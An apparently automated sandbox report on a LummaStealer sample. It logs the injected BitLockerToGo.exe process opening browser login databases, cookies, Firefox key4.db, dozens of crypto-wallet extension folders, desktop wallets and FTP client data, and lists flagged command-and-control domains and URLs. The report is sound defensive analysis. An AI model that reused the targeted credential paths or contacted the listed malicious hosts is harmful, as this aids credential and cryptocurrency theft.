            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 612, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 612, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            1
            Software
            Acquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Modify Registry
            2
            OS Credential Dumping
            121
            Security Software Discovery
            Remote Services1
            Screen Capture
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            11
            Virtualization/Sandbox Evasion
            LSASS Memory11
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)Logon Script (Windows)311
            Process Injection
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin Shares41
            Data from Local System
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDS1
            File and Directory Discovery
            Distributed Component Object Model2
            Clipboard Data
            Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information
            LSA Secrets23
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            6wFwugeLNG.exe68%ReversingLabsWin32.Trojan.LummaStealer
            6wFwugeLNG.exe43%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://kliptizq.shop/100%Avira URL Cloudmalware
            https://cycahao.shop/api100%Avira URL Cloudmalware
            https://cycahao.shop/apivVa100%Avira URL Cloudmalware
            https://cycahao.shop/apibMMCEY100%Avira URL Cloudmalware
            https://cycahao.shop/100%Avira URL Cloudmalware
            https://kliptizq.shop/int_clp_ldr_sha.txt9:100%Avira URL Cloudmalware
            https://cycahao.shop/6100%Avira URL Cloudmalware
            cycahao.shop100%Avira URL Cloudmalware
            https://kliptizq.shop/int_clp_ldr_sha.txtz1100%Avira URL Cloudmalware
            https://cycahao.shop/apiVr100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            cycahao.shop
            172.67.135.139
            truetrue
              unknown
              kliptizq.shop
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                sordid-snaked.cyoufalse
                  high
                  https://cycahao.shop/apitrue
                  • Avira URL Cloud: malware
                  unknown
                  awake-weaves.cyoufalse
                    high
                    immureprech.bizfalse
                      high
                      deafeninggeh.bizfalse
                        high
                        cycahao.shoptrue
                        • Avira URL Cloud: malware
                        unknown
                        debonairnukk.xyzfalse
                          high
                          diffuculttan.xyzfalse
                            high
                            effecterectz.xyzfalse
                              high
                              wrathful-jammy.cyoufalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000005.00000003.2437966347.0000000004E5B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438173649.0000000004E59000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2438068649.0000000004E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://kliptizq.shop/BitLockerToGo.exe, 00000005.00000003.2591711975.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2592310542.0000000000745000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2592834954.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.BitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://cycahao.shop/apiVrBitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://kliptizq.shop/int_clp_ldr_sha.txt9:BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000005.00000003.2484806953.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cycahao.shop/6BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
